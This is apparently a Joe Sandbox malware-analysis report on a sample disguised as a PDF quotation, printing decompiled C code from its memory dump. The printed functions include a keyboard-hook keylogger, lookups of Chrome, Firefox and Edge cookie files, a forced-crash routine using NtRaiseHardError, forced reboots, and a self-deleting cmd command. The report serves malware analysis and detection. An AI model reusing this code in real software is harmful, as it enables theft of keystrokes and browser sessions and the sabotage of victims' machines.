Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocVirtuallstrcpylstrlen
String ID:
API String ID: 3475654917-0
Opcode ID: 3c891b3e8b918ab8f297b86bb0fb2ea8e916c56f6914e164736c89a62656364d
Instruction ID: 14dac4f621c178a78ea53808c12b4b4e22562f7f8585fd99e8490e7573f2f78f
Opcode Fuzzy Hash: 3c891b3e8b918ab8f297b86bb0fb2ea8e916c56f6914e164736c89a62656364d
Instruction Fuzzy Hash: F8F0F835604209EFCB05DF98E855E8DBBF4EF09344F1140A9F509AB3A0CB35AE50EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00406B9C Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406B9C(CHAR** __ecx, CHAR** _a4) {
				CHAR** _v8;
				CHAR* _t13;

				_push(__ecx);
				_v8 = __ecx;
				 *_v8 =  *_v8 & 0x00000000;
				if( *_a4 != 0) {
					_t13 = E0040B7F4(E00406AB8(_a4), 0x3000); // executed
					 *_v8 = _t13;
					lstrcpyA( *_v8,  *_a4);
				}
				return _v8;
			}

0x00406b9f
0x00406ba0
0x00406ba6
0x00406baf
0x00406bbf
0x00406bc9
0x00406bd5
0x00406bd5
0x00406bdf

APIs

Part of subcall function 00406AB8: lstrlenA.KERNEL32(?,00406F0C,00406F0C,?,00406BBE,00003000,?,?,00406F0C,?,?,?,?,0040975B), ref: 00406ACD

Part of subcall function 0040B7F4: VirtualAlloc.KERNEL32(00000000,?,?,00000004,?,00406FE8,?,00003000,?,?,00422109,?), ref: 0040B801

lstrcpyA.KERNEL32(?,00406F0C,?,?,00406F0C,?,?,?,?,0040975B,?,?,?,?,?), ref: 00406BD5

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocVirtuallstrcpylstrlen
String ID:
API String ID: 3475654917-0
Opcode ID: 485d4978d42c72cc9fb2c45e887b8ae9790e857bd8b9595b74ffe3d87328f70a
Instruction ID: 8bcc43083f10ce95051faa6cafa642e0aeaf6db4fbc5cdbe7debfcd026b781a8
Opcode Fuzzy Hash: 485d4978d42c72cc9fb2c45e887b8ae9790e857bd8b9595b74ffe3d87328f70a
Instruction Fuzzy Hash: 30F01571604208EFCB05DF98D891A8D7BF8EF09304F2140A9F505AB3A0CB75AE50EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F4 Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B7F4(long _a4, long _a8) {
				void* _t3;

				_t3 = VirtualAlloc(0, _a4, _a8, 4); // executed
				return _t3;
			}

0x0040b801
0x0040b808

APIs

VirtualAlloc.KERNEL32(00000000,?,?,00000004,?,00406FE8,?,00003000,?,?,00422109,?), ref: 0040B801

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4c376f3590f81502ea08ee822801436643578068c2dedad262cc8837ccc51629
Instruction ID: a619d7276549b5bb8e5fab280d3d4adf1c6a8dfe5f402422bebd2389a7fe46f6
Opcode Fuzzy Hash: 4c376f3590f81502ea08ee822801436643578068c2dedad262cc8837ccc51629
Instruction Fuzzy Hash: C6C0923628420CBBDF111FC1EC06FC83F69EB08BB6F408010FB0C080A086B29560AB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7DF Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B7DF(void* _a4) {
				int _t2;

				_t2 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t2;
			}

0x0040b7ec
0x0040b7f3

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,00406BF3,004241D6,0042419E,?,0040B464,004241A6,?,00420A5E,?,?,004241D6), ref: 0040B7EC

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5d39133feb4b0fef0131fd420d981d5fde32939558020c543c2b7aa07fc03975
Instruction ID: 11db55b345d612cbc3c563b36a5635e394cfaf619c7765c4b66129b0cfd56be1
Opcode Fuzzy Hash: 5d39133feb4b0fef0131fd420d981d5fde32939558020c543c2b7aa07fc03975
Instruction Fuzzy Hash: 19B012302C430CF7DA202B81EC06F843F1CE700B61F5040A0F60C190F18BA274524EDC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040518B Relevance: 58.1, APIs: 16, Strings: 17, Instructions: 361
libraryprocessloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040518B(intOrPtr _a8) {
				signed int _v8;
				char _v9;
				char _v10;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v57;
				char _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				int _v104;
				intOrPtr _v108;
				int _v112;
				intOrPtr _v116;
				WCHAR* _v120;
				WCHAR* _v124;
				signed int _v128;
				WCHAR* _v132;
				WCHAR* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				char _v148;
				int _v152;
				struct _PROCESS_INFORMATION _v168;
				void* _v184;
				char _v208;
				void _v276;
				struct _STARTUPINFOA _v344;
				char _v604;
				char _v1124;
				short _v1644;
				intOrPtr _t148;
				int _t177;
				int _t188;
				int _t205;
				signed int _t271;
				signed int _t273;
				char _t275;
				short _t276;
				void* _t290;
				void* _t304;
				void* _t309;
				void* _t314;
				void* _t340;
				void* _t341;

				_v72 = _a8;
				_v76 = E00407439(_v72);
				_t148 = _v76;
				_v16 = _t148;
				if(_v16 == 0) {
					return WinExec("shutdown.exe /r /t 00", 0);
				}
				if(_v16 == 1) {
					return WinExec("shutdown.exe /r /f /t 00", 0);
				}
				if(_v16 == 2) {
					_v80 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
					_v84 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtRaiseHardError");
					_v88 = _v80;
					_v96 = _v84;
					_v92 = _v88;
					_v144 = _v92(0x13, 1, 0,  &_v57);
					_v100 = _v96;
					return _v100(0xc00002b4, 0, 0, 0, 6,  &_v148);
				}
				if(_v16 == 3) {
					E0040132F( &_v276, 0, 0x44);
					_t271 = 0x11;
					memcpy( &_v344,  &_v276, _t271 << 2);
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = _v8 & 0x00000000;
					GetModuleFileNameA(0,  &_v604, 0x104);
					_t273 = 0xe;
					memcpy( &_v1124, "cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C ", _t273 << 2);
					_v8 = _v8 + 0x38;
					_t275 = "\""; // 0x22
					 *((char*)(_t340 + _v8 - 0x460)) = _t275;
					_v8 = _v8 + 1;
					_v20 =  &_v604;
					_t177 = _v20 + 1;
					__eflags = _t177;
					_v104 = _t177;
					do {
						_v9 =  *_v20;
						_v20 = _v20 + 1;
						__eflags = _v9;
					} while (_v9 != 0);
					_v108 = _v20 - _v104;
					E00401309(_t340 + _v8 - 0x460,  &_v604, _v108);
					_v24 =  &_v604;
					_t188 = _v24 + 1;
					__eflags = _t188;
					_v112 = _t188;
					do {
						_v10 =  *_v24;
						_v24 = _v24 + 1;
						__eflags = _v10;
					} while (__eflags != 0);
					_v116 = _v24 - _v112;
					_v8 = _v8 + _v116;
					_t276 = "\""; // 0x22
					 *((short*)(_t340 + _v8 - 0x460)) = _t276;
					E0041E9F8(_t276, __eflags,  &_v64, 5);
					E00406C53( &_v64, __eflags, L"\\Documents:ApplicationData");
					E0041EA3F(__eflags,  &_v68);
					_v120 = CharLowerW(E00406F44( &_v64));
					_v124 = CharLowerW(E00406F44( &_v68));
					_t205 = lstrcmpW(_v124, _v120);
					__eflags = _t205;
					if(_t205 == 0) {
						E00406BE2();
						return E00406BE2();
					}
					_v152 = CreateProcessA(0,  &_v1124, 0, 0, 0, 0x8000000, 0, 0,  &_v344,  &_v168);
					CloseHandle(_v168.hThread);
					CloseHandle(_v168);
					ExitProcess(0);
				}
				if(_v16 == 4) {
					ExitProcess(0);
				}
				if(_v16 == 5) {
					E0041F24C( &_v208, __eflags);
					E0041E9F8( &_v208, __eflags,  &_v56, 0x1c);
					E00406C53( &_v56, __eflags, L"Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies");
					E00406FBC(_t341,  &_v56);
					E0041EE12( &_v56);
					_pop(_t290);
					E0041E9F8(_t290, __eflags,  &_v28, 0x1a);
					E00406C53( &_v28, __eflags, L"\\Mozilla\\Firefox\\");
					E00406FBC( &_v52,  &_v28);
					E00406C53( &_v52, __eflags, L"profiles.ini");
					E00406F64( &_v48, L"Profile");
					_v128 = _v128 & 0x00000000;
					E00406CDA( &_v48, __eflags, _v128);
					E0040132F( &_v1644, 0, 0x208);
					_t346 = _t341 + 0xc;
					_v132 = E00406F44( &_v52);
					_v136 = E00406F44( &_v48);
					GetPrivateProfileStringW(_v136, L"Path", 0,  &_v1644, 0x104, _v132);
					E00406FBC( &_v44,  &_v28);
					_v140 = E00406C53( &_v44, __eflags,  &_v1644);
					E00406C7E(_v140, __eflags, "\\cookies.sqlite");
					E00406FBC(_t341 + 0xc,  &_v44);
					E0041EE12(_v140);
					_pop(_t304);
					E0041E9F8(_t304, __eflags,  &_v40, 0x1c);
					E00406C7E( &_v40, __eflags, "\\Microsoft\\Edge\\User Data\\Default\\cookies");
					E00406FBC(_t341 + 0xc,  &_v40);
					E0041EE12( &_v40);
					_pop(_t309);
					E0041E9F8(_t309, __eflags,  &_v36, 0x1c);
					E00406C7E( &_v36, __eflags, "\\Microsoft\\Windows\\INetCookies");
					E00406FBC(_t341 + 0xc,  &_v36);
					E0041EE12( &_v36);
					_pop(_t314);
					E0041E9F8(_t314, __eflags,  &_v32, 0x1c);
					E00406C7E( &_v32, __eflags, "\\Microsoft\\Windows\\Cookies");
					E00406FBC(_t346,  &_v32);
					E0041EE12( &_v32);
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					E00406BE2();
					return E0041EDEB( &_v208, __eflags);
				}
				return _t148;
			}

0x00405199
0x004051a4
0x004051a7
0x004051aa
0x004051b1
0x00000000
0x004051e9
0x004051b7
0x00000000
0x004051fb
0x004051bd
0x0040521d
0x00405237
0x0040523d
0x00405243
0x00405249
0x00405259
0x00405262
0x00000000
0x00405279
0x004051c3
0x0040528c
0x00405296
0x004052a3
0x004052ad
0x004052ae
0x004052af
0x004052b0
0x004052bd
0x004052be
0x004052bf
0x004052c0
0x004052c1
0x004052d3
0x004052db
0x004052e7
0x004052ef
0x004052f5
0x004052fb
0x00405306
0x0040530f
0x00405315
0x00405315
0x00405316
0x00405319
0x0040531e
0x00405321
0x00405324
0x00405324
0x00405330
0x00405348
0x00405356
0x0040535c
0x0040535c
0x0040535d
0x00405360
0x00405365
0x00405368
0x0040536b
0x0040536b
0x00405377
0x00405380
0x00405386
0x0040538d
0x0040539b
0x004053aa
0x004053b3
0x004053c8
0x004053da
0x004053e3
0x004053e9
0x004053eb
0x00405442
0x00000000
0x0040544a
0x00405419
0x00405425
0x00405431
0x00405439
0x00405439
0x004051cd
0x00405456
0x00405456
0x004051d7
0x00405462
0x0040546d
0x0040547c
0x00405488
0x0040548d
0x00405492
0x00405499
0x004054a8
0x004054b4
0x004054c1
0x004054ce
0x004054d3
0x004054dd
0x004054f0
0x004054f5
0x00405500
0x0040550b
0x0040552d
0x0040553a
0x0040554e
0x0040555f
0x0040556b
0x00405570
0x00405575
0x0040557c
0x0040558b
0x00405597
0x0040559c
0x004055a1
0x004055a8
0x004055b7
0x004055c3
0x004055c8
0x004055cd
0x004055d4
0x004055e3
0x004055ef
0x004055f4
0x004055fd
0x00405605
0x0040560d
0x00405615
0x0040561d
0x00405625
0x0040562d
0x00405635
0x00000000
0x00405640
0x00000000

APIs

WinExec.KERNEL32 ref: 004051E9
WinExec.KERNEL32 ref: 004051FB
LoadLibraryA.KERNEL32(ntdll.dll,RtlAdjustPrivilege), ref: 00405210
GetProcAddress.KERNEL32(00000000), ref: 00405217
GetModuleHandleA.KERNEL32(ntdll.dll,NtRaiseHardError), ref: 0040522A
GetProcAddress.KERNEL32(00000000), ref: 00405231
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004052D3
ExitProcess.KERNEL32 ref: 00405456
GetPrivateProfileStringW.KERNEL32 ref: 0040552D

Strings

profiles.ini, xrefs: 004054B9
\Microsoft\Windows\INetCookies, xrefs: 004055AF
shutdown.exe /r /t 00, xrefs: 004051E4
RtlAdjustPrivilege, xrefs: 00405206
cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C , xrefs: 004052DC
\Documents:ApplicationData, xrefs: 004053A2
shutdown.exe /r /f /t 00, xrefs: 004051F6
\cookies.sqlite, xrefs: 00405554
\Microsoft\Edge\User Data\Default\cookies, xrefs: 00405583
ntdll.dll, xrefs: 0040520B
Profile, xrefs: 004054C6
NtRaiseHardError, xrefs: 00405220
Local\Google\Chrome\User Data\Default\Network\Cookies, xrefs: 00405474
\Mozilla\Firefox\, xrefs: 004054A0
Path, xrefs: 00405522
\Microsoft\Windows\Cookies, xrefs: 004055DB
ntdll.dll, xrefs: 00405225

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressExecModuleProc$ExitFileHandleLibraryLoadNamePrivateProcessProfileString
String ID: Local\Google\Chrome\User Data\Default\Network\Cookies$NtRaiseHardError$Path$Profile$RtlAdjustPrivilege$\Documents:ApplicationData$\Microsoft\Edge\User Data\Default\cookies$\Microsoft\Windows\Cookies$\Microsoft\Windows\INetCookies$\Mozilla\Firefox\$\cookies.sqlite$cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C $ntdll.dll$ntdll.dll$profiles.ini$shutdown.exe /r /f /t 00$shutdown.exe /r /t 00
API String ID: 2458868650-2054315210
Opcode ID: e01ada29270d9f0ca200783ff8b3e3edfc8c1146294db0b52a28ce66c5353adb
Instruction ID: 38c8e6d06dd699d40218355c29f89eaec98bd7e7a64b2cea29cb0ee68063175c
Opcode Fuzzy Hash: e01ada29270d9f0ca200783ff8b3e3edfc8c1146294db0b52a28ce66c5353adb
Instruction Fuzzy Hash: 0AE14C71E0021CAEDB14EBA5EC46BEEB7B8EF04304F61406AF506B7191DB786A45CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00412776 Relevance: 49.5, APIs: 17, Strings: 11, Instructions: 471
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00412776(void* __ecx, int _a4, int _a8, long _a12) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				intOrPtr* _v24;
				int _v28;
				char _v32;
				char _v36;
				short _v48;
				short _v60;
				short _v92;
				signed int _t121;
				short _t179;
				signed char _t180;
				signed int _t187;
				void* _t199;
				void* _t244;

				_t199 = __ecx;
				_v24 = _a12;
				_v28 = _a8;
				if(_v28 == 0x100 || _v28 == 0x104) {
					_v12 =  *_v24;
					__eflags = _v12 - 0x27;
					if(_v12 < 0x27) {
						L21:
						__eflags = _v12 - 0x40;
						if(_v12 <= 0x40) {
							L29:
							_v8 = _v12;
							__eflags = _v8 - 0x68;
							if(_v8 > 0x68) {
								__eflags = _v8 - 0xbc;
								if(_v8 > 0xbc) {
									__eflags = _v8 - 0xdb;
									if(_v8 > 0xdb) {
										__eflags = _v8 - 0xdc;
										if(_v8 == 0xdc) {
											__eflags = GetAsyncKeyState(0x10);
											if(__eflags == 0) {
												E00412EF7(_t199, __eflags, "\\");
											} else {
												E00412EF7(_t199, __eflags, "|");
											}
											goto L148;
										}
										__eflags = _v8 - 0xdd;
										if(_v8 == 0xdd) {
											__eflags = GetAsyncKeyState(0x10);
											if(__eflags == 0) {
												E00412EF7(_t199, __eflags, "]");
											} else {
												E00412EF7(_t199, __eflags, "}");
											}
											goto L148;
										}
										__eflags = _v8 - 0xde;
										if(_v8 == 0xde) {
											__eflags = GetAsyncKeyState(0x10);
											if(__eflags == 0) {
												E00412EF7(_t199, __eflags, "\'");
											} else {
												E00412EF7(_t199, __eflags, "\"");
											}
											goto L148;
										}
										L147:
										_v16 = 1;
										_v16 = ( *(_v24 + 4) << 0x10) + _v16;
										_t121 = ( *(_v24 + 8) << 0x18) + _v16;
										__eflags = _t121;
										_v16 = _t121;
										GetKeyNameTextW(_v16,  &_v92, 0xf);
										E00412EF7(_t199, __eflags,  &_v92);
										goto L148;
									}
									__eflags = _v8 - 0xdb;
									if(_v8 == 0xdb) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, "[");
										} else {
											E00412EF7(_t199, __eflags, "{");
										}
										goto L148;
									}
									__eflags = _v8 - 0xbd;
									if(_v8 == 0xbd) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, "-");
										} else {
											E00412EF7(_t199, __eflags, "_");
										}
										goto L148;
									}
									__eflags = _v8 - 0xbe;
									if(_v8 == 0xbe) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, ".");
										} else {
											E00412EF7(_t199, __eflags, ">");
										}
										goto L148;
									}
									__eflags = _v8 - 0xbf;
									if(_v8 == 0xbf) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, "/");
										} else {
											E00412EF7(_t199, __eflags, "?");
										}
										goto L148;
									}
									__eflags = _v8 - 0xc0;
									if(_v8 == 0xc0) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, "`");
										} else {
											E00412EF7(_t199, __eflags, "~");
										}
										goto L148;
									}
									goto L147;
								}
								__eflags = _v8 - 0xbc;
								if(_v8 == 0xbc) {
									__eflags = GetAsyncKeyState(0x10);
									if(__eflags == 0) {
										E00412EF7(_t199, __eflags, ",");
									} else {
										E00412EF7(_t199, __eflags, "<");
									}
									goto L148;
								}
								__eflags = _v8 - 0xa3;
								if(_v8 > 0xa3) {
									__eflags = _v8 - 0xa4;
									if(__eflags == 0) {
										L87:
										E00412EF7(_t199, __eflags, L"[ALT]");
										goto L148;
									}
									__eflags = _v8 - 0xa5;
									if(__eflags == 0) {
										goto L87;
									}
									__eflags = _v8 - 0xba;
									if(_v8 == 0xba) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, ";");
										} else {
											E00412EF7(_t199, __eflags, ":");
										}
										goto L148;
									}
									__eflags = _v8 - 0xbb;
									if(_v8 == 0xbb) {
										__eflags = GetAsyncKeyState(0x10);
										if(__eflags == 0) {
											E00412EF7(_t199, __eflags, "=");
										} else {
											E00412EF7(_t199, __eflags, "+");
										}
										goto L148;
									}
									goto L147;
								}
								__eflags = _v8 - 0xa3;
								if(__eflags == 0) {
									L86:
									E00412EF7(_t199, __eflags, L"[CTRL]");
									goto L148;
								}
								__eflags = _v8 - 0x69;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, "9");
									goto L148;
								}
								__eflags = _v8 - 0xa0;
								if(_v8 == 0xa0) {
									L126:
									goto L148;
								}
								__eflags = _v8 - 0xa1;
								if(_v8 == 0xa1) {
									goto L126;
								}
								__eflags = _v8 - 0xa2;
								if(__eflags == 0) {
									goto L86;
								}
								goto L147;
							}
							__eflags = _v8 - 0x68;
							if(__eflags == 0) {
								E00412EF7(_t199, __eflags, "8");
								goto L148;
							}
							__eflags = _v8 - 0x2d;
							if(_v8 > 0x2d) {
								__eflags = _v8 - 0x63;
								if(_v8 > 0x63) {
									__eflags = _v8 - 0x64;
									if(__eflags == 0) {
										E00412EF7(_t199, __eflags, "4");
										goto L148;
									}
									__eflags = _v8 - 0x65;
									if(__eflags == 0) {
										E00412EF7(_t199, __eflags, "5");
										goto L148;
									}
									__eflags = _v8 - 0x66;
									if(__eflags == 0) {
										E00412EF7(_t199, __eflags, "6");
										goto L148;
									}
									__eflags = _v8 - 0x67;
									if(__eflags == 0) {
										E00412EF7(_t199, __eflags, "7");
										goto L148;
									}
									goto L147;
								}
								__eflags = _v8 - 0x63;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, "3");
									goto L148;
								}
								__eflags = _v8 - 0x2e;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, L"[DEL]");
									goto L148;
								}
								__eflags = _v8 - 0x60;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, "0");
									goto L148;
								}
								__eflags = _v8 - 0x61;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, "1");
									goto L148;
								}
								__eflags = _v8 - 0x62;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, "2");
									goto L148;
								}
								goto L147;
							}
							__eflags = _v8 - 0x2d;
							if(__eflags == 0) {
								E00412EF7(_t199, __eflags, L"[INSERT]");
								goto L148;
							}
							__eflags = _v8 - 0x11;
							if(_v8 > 0x11) {
								__eflags = _v8 - 0x12;
								if(__eflags == 0) {
									goto L87;
								}
								__eflags = _v8 - 0x14;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, L"[CAPS]");
									goto L148;
								}
								__eflags = _v8 - 0x1b;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, L"[ESC]");
									goto L148;
								}
								__eflags = _v8 - 0x20;
								if(__eflags == 0) {
									E00412EF7(_t199, __eflags, " ");
									goto L148;
								}
								goto L147;
							}
							__eflags = _v8 - 0x11;
							if(__eflags == 0) {
								goto L86;
							}
							__eflags = _v8 - 8;
							if(__eflags == 0) {
								E00412EF7(_t199, __eflags, L"[BKSP]");
								goto L148;
							}
							__eflags = _v8 - 9;
							if(__eflags == 0) {
								E00412EF7(_t199, __eflags, L"[TAB]");
								goto L148;
							}
							__eflags = _v8 - 0xd;
							if(__eflags == 0) {
								E00412EF7(_t199, __eflags, L"[ENTER]\r\n");
								goto L148;
							}
							__eflags = _v8 - 0x10;
							if(_v8 == 0x10) {
								goto L126;
							}
							goto L147;
						}
						__eflags = _v12 - 0x5b;
						if(_v12 >= 0x5b) {
							goto L29;
						}
						_v36 = E00412EDC();
						_t179 = GetAsyncKeyState(0x10);
						__eflags = _t179;
						if(_t179 == 0) {
							_v32 = 0;
						} else {
							_v32 = 1;
						}
						_t180 = E00412EA6(_t199, _v32, _v36);
						_pop(_t244);
						__eflags = _t180 & 0x000000ff;
						if(__eflags == 0) {
							_t187 = _v12 + 0x20;
							__eflags = _t187;
							_v12 = _t187;
						}
						wsprintfW( &_v60, L"%c", _v12);
						E00412EF7(_t244, __eflags,  &_v60);
						goto L148;
					}
					__eflags = _v12 - 0x40;
					if(_v12 > 0x40) {
						goto L21;
					}
					__eflags = GetAsyncKeyState(0x10);
					if(__eflags == 0) {
						wsprintfW( &_v48, L"%c", _v12);
						E00412EF7(_t199, __eflags,  &_v48);
						L20:
						goto L148;
					}
					_v20 = _v12;
					_v20 = _v20 - 0x30;
					__eflags = _v20 - 9;
					if(__eflags > 0) {
						L18:
						goto L20;
					}
					switch( *((intOrPtr*)(_v20 * 4 +  &M00412E7E))) {
						case 0:
							E00412EF7(_t199, __eflags, ")");
							goto L18;
						case 1:
							__eax = E00412EF7(__ecx, __eflags, "!");
							goto L18;
						case 2:
							__eax = E00412EF7(__ecx, __eflags, "@");
							goto L18;
						case 3:
							__eax = E00412EF7(__ecx, __eflags, "#");
							goto L18;
						case 4:
							__eax = E00412EF7(__ecx, __eflags, "$");
							goto L18;
						case 5:
							__eax = E00412EF7(__ecx, __eflags, "%");
							goto L18;
						case 6:
							__eax = E00412EF7(__ecx, __eflags, "^");
							goto L18;
						case 7:
							__eax = E00412EF7(__ecx, __eflags, "&");
							goto L18;
						case 8:
							__eax = E00412EF7(__ecx, __eflags, "*");
							goto L18;
						case 9:
							__eax = E00412EF7(__ecx, __eflags, "(");
							goto L18;
					}
				} else {
					L148:
					return CallNextHookEx(0, _a4, _a8, _a12);
				}
			}

0x00412776
0x0041277f
0x00412785
0x0041278f
0x004127a4
0x004127a7
0x004127ab
0x00412895
0x00412895
0x00412899
0x00412901
0x00412904
0x00412907
0x0041290b
0x004129ff
0x00412a06
0x00412a9e
0x00412aa5
0x00412aed
0x00412af4
0x00412ce0
0x00412ce2
0x00412cf6
0x00412ce4
0x00412ce9
0x00412cee
0x00000000
0x00412cfc
0x00412afa
0x00412b01
0x00412d0a
0x00412d0c
0x00412d20
0x00412d0e
0x00412d13
0x00412d18
0x00000000
0x00412d26
0x00412b07
0x00412b0e
0x00412d34
0x00412d36
0x00412d4a
0x00412d38
0x00412d3d
0x00412d42
0x00000000
0x00412d50
0x00412e26
0x00412e26
0x00412e39
0x00412e45
0x00412e45
0x00412e48
0x00412e54
0x00412e5e
0x00000000
0x00412e63
0x00412aa7
0x00412aae
0x00412cb6
0x00412cb8
0x00412ccc
0x00412cba
0x00412cbf
0x00412cc4
0x00000000
0x00412cd2
0x00412ab4
0x00412abb
0x00412de1
0x00412de3
0x00412df7
0x00412de5
0x00412dea
0x00412def
0x00000000
0x00412dfd
0x00412ac1
0x00412ac8
0x00412d8d
0x00412d8f
0x00412da3
0x00412d91
0x00412d96
0x00412d9b
0x00000000
0x00412da9
0x00412ace
0x00412ad5
0x00412c62
0x00412c64
0x00412c78
0x00412c66
0x00412c6b
0x00412c70
0x00000000
0x00412c7e
0x00412adb
0x00412ae2
0x00412c8c
0x00412c8e
0x00412ca2
0x00412c90
0x00412c95
0x00412c9a
0x00000000
0x00412ca8
0x00000000
0x00412ae8
0x00412a0c
0x00412a13
0x00412d63
0x00412d65
0x00412d79
0x00412d67
0x00412d6c
0x00412d71
0x00000000
0x00412d7f
0x00412a19
0x00412a20
0x00412a65
0x00412a6c
0x00412b69
0x00412b6e
0x00000000
0x00412b73
0x00412a72
0x00412a79
0x00000000
0x00000000
0x00412a7f
0x00412a86
0x00412db7
0x00412db9
0x00412dcd
0x00412dbb
0x00412dc0
0x00412dc5
0x00000000
0x00412dd3
0x00412a8c
0x00412a93
0x00412e08
0x00412e0a
0x00412e1e
0x00412e0c
0x00412e11
0x00412e16
0x00000000
0x00412e24
0x00000000
0x00412a99
0x00412a22
0x00412a29
0x00412b59
0x00412b5e
0x00000000
0x00412b63
0x00412a2f
0x00412a33
0x00412c4e
0x00000000
0x00412c53
0x00412a39
0x00412a40
0x00412d55
0x00000000
0x00412d55
0x00412a46
0x00412a4d
0x00000000
0x00000000
0x00412a53
0x00412a5a
0x00000000
0x00000000
0x00000000
0x00412a60
0x00412911
0x00412915
0x00412c3e
0x00000000
0x00412c43
0x0041291b
0x0041291f
0x00412995
0x00412999
0x004129d2
0x004129d6
0x00412bfe
0x00000000
0x00412c03
0x004129dc
0x004129e0
0x00412c0e
0x00000000
0x00412c13
0x004129e6
0x004129ea
0x00412c1e
0x00000000
0x00412c23
0x004129f0
0x004129f4
0x00412c2e
0x00000000
0x00412c33
0x00000000
0x004129fa
0x0041299b
0x0041299f
0x00412bee
0x00000000
0x00412bf3
0x004129a5
0x004129a9
0x00412bae
0x00000000
0x00412bb3
0x004129af
0x004129b3
0x00412bbe
0x00000000
0x00412bc3
0x004129b9
0x004129bd
0x00412bce
0x00000000
0x00412bd3
0x004129c3
0x004129c7
0x00412bde
0x00000000
0x00412be3
0x00000000
0x004129cd
0x00412921
0x00412925
0x00412b9e
0x00000000
0x00412ba3
0x0041292b
0x0041292f
0x00412968
0x0041296c
0x00000000
0x00000000
0x00412972
0x00412976
0x00412b7e
0x00000000
0x00412b83
0x0041297c
0x00412980
0x00412b8e
0x00000000
0x00412b93
0x00412986
0x0041298a
0x00412b1e
0x00000000
0x00412b23
0x00000000
0x00412990
0x00412931
0x00412935
0x00000000
0x00000000
0x0041293b
0x0041293f
0x00412b3e
0x00000000
0x00412b43
0x00412945
0x00412949
0x00412b4e
0x00000000
0x00412b53
0x0041294f
0x00412953
0x00412b2e
0x00000000
0x00412b33
0x00412959
0x0041295d
0x00000000
0x00000000
0x00000000
0x00412963
0x0041289b
0x0041289f
0x00000000
0x00000000
